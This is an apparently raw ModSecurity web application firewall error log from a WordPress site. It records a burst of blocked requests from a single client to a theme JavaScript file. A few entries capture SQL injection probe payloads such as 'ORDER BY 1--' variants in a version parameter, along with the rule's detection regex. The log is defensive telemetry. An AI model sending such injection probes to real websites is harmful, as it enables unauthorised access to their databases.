[file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGY_cO2IzqYGkif72pNwAAAAE"] [Sun Jul 07 16:19:32.283184 2024] [:error] [pid 30826:tid 139722508650240] [client 141.98.81.37:37942] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGZPcO2IzqYGkif72pOAAAABM"] [Sun Jul 07 16:19:33.338757 2024] [:error] [pid 30826:tid 139722559006464] [client 141.98.81.37:37944] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGZfcO2IzqYGkif72pOQAAAA0"] [Sun Jul 07 16:19:34.353910 2024] [:error] [pid 31926:tid 139722659718912] [client 141.98.81.37:37946] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1-- EYLi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGZnug2jzbr_AlO3d0CgAAAME"] [Sun Jul 07 16:19:35.391338 2024] [:error] [pid 30826:tid 139722626148096] [client 141.98.81.37:37948] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGZ_cO2IzqYGkif72pOgAAAAU"] [Sun Jul 07 16:19:36.437949 2024] [:error] [pid 31926:tid 139722626148096] [client 141.98.81.37:37952] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGaHug2jzbr_AlO3d0CwAAAMU"] [Sun Jul 07 16:19:37.483460 2024] [:error] [pid 31926:tid 139722617755392] [client 141.98.81.37:37958] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGaXug2jzbr_AlO3d0DQAAAMY"] [Sun Jul 07 16:19:38.551321 2024] [:error] [pid 30826:tid 139722592577280] [client 141.98.81.37:37960] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGavcO2IzqYGkif72pPAAAAAk"] [Sun Jul 07 16:19:39.658532 2024] [:error] [pid 30826:tid 139722475079424] [client 141.98.81.37:37962] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGa_cO2IzqYGkif72pPQAAABc"] [Sun Jul 07 16:19:40.785279 2024] [:error] [pid 30828:tid 139722668111616] [client 141.98.81.37:37964] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGbDbJWLg2ecbngu9JcwAAAIA"] [Sun Jul 07 16:19:41.839745 2024] [:error] [pid 31926:tid 139722525435648] [client 141.98.81.37:37966] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGbXug2jzbr_AlO3d0DgAAANE"] [Sun Jul 07 16:19:42.859494 2024] [:error] [pid 30826:tid 139722483472128] [client 141.98.81.37:37968] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGbvcO2IzqYGkif72pPgAAABY"] [Sun Jul 07 16:19:44.076673 2024] [:error] [pid 31926:tid 139722550613760] [client 141.98.81.37:37970] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGcHug2jzbr_AlO3d0DwAAAM4"] [Sun Jul 07 16:19:44.996068 2024] [:error] [pid 31926:tid 139722542221056] [client 141.98.81.37:37972] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGcHug2jzbr_AlO3d0EAAAAM8"] [Sun Jul 07 16:19:45.954571 2024] [:error] [pid 31926:tid 139722634540800] [client 141.98.81.37:37974] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47') ORDER BY 1-- oIFX"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGcXug2jzbr_AlO3d0EQAAAMQ"] [Sun Jul 07 16:19:47.037162 2024] [:error] [pid 31926:tid 139722533828352] [client 141.98.81.37:37976] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGc3ug2jzbr_AlO3d0EgAAANA"] [Sun Jul 07 16:19:48.182166 2024] [:error] [pid 30827:tid 139722525435648] [client 141.98.81.37:37978] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGdEGuaLybMBNkB61uHwAAAFE"] [Sun Jul 07 16:19:49.787066 2024] [:error] [pid 31926:tid 139722559006464] [client 141.98.81.37:37980] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGdXug2jzbr_AlO3d0EwAAAM0"] [Sun Jul 07 16:19:50.150250 2024] [:error] [pid 31926:tid 139722508650240] [client 141.98.81.37:37982] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGdnug2jzbr_AlO3d0FAAAANM"] [Sun Jul 07 16:19:51.316615 2024] [:error] [pid 31926:tid 139722517042944] [client 141.98.81.37:37984] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGd3ug2jzbr_AlO3d0FQAAANI"] [Sun Jul 07 16:19:52.305659 2024] [:error] [pid 30827:tid 139722668111616] [client 141.98.81.37:37986] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGeEGuaLybMBNkB61uIAAAAEA"] [Sun Jul 07 16:19:53.178728 2024] [:error] [pid 30828:tid 139722517042944] [client 141.98.81.37:37988] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGeTbJWLg2ecbngu9JdAAAAJI"] [Sun Jul 07 16:19:54.341424 2024] [:error] [pid 30826:tid 139722584184576] [client 141.98.81.37:37990] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGevcO2IzqYGkif72pPwAAAAo"] [Sun Jul 07 16:19:55.355486 2024] [:error] [pid 31926:tid 139722609362688] [client 141.98.81.37:37992] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGe3ug2jzbr_AlO3d0FgAAAMc"] [Sun Jul 07 16:19:58.131687 2024] [:error] [pid 31926:tid 139722483472128] [client 141.98.81.37:37994] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGfnug2jzbr_AlO3d0FwAAANY"] [Sun Jul 07 16:19:58.403583 2024] [:error] [pid 30828:tid 139722626148096] [client 141.98.81.37:37996] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47' ORDER BY 1-- lJrr"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGfjbJWLg2ecbngu9JdQAAAIU"] [Sun Jul 07 16:19:59.404319 2024] [:error] [pid 31926:tid 139722466686720] [client 141.98.81.37:37998] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGf3ug2jzbr_AlO3d0GAAAANg"] [Sun Jul 07 16:20:01.083809 2024] [:error] [pid 30827:tid 139722517042944] [client 141.98.81.37:38000] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGgUGuaLybMBNkB61uIQAAAFI"] [Sun Jul 07 16:20:01.581830 2024] [:error] [pid 30827:tid 139722617755392] [client 141.98.81.37:38002] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGgUGuaLybMBNkB61uIgAAAEY"] [Sun Jul 07 16:20:02.660571 2024] [:error] [pid 30827:tid 139722542221056] [client 141.98.81.37:38004] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGgkGuaLybMBNkB61uIwAAAE8"] [Sun Jul 07 16:20:04.668515 2024] [:error] [pid 30827:tid 139722659718912] [client 141.98.81.37:38006] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: 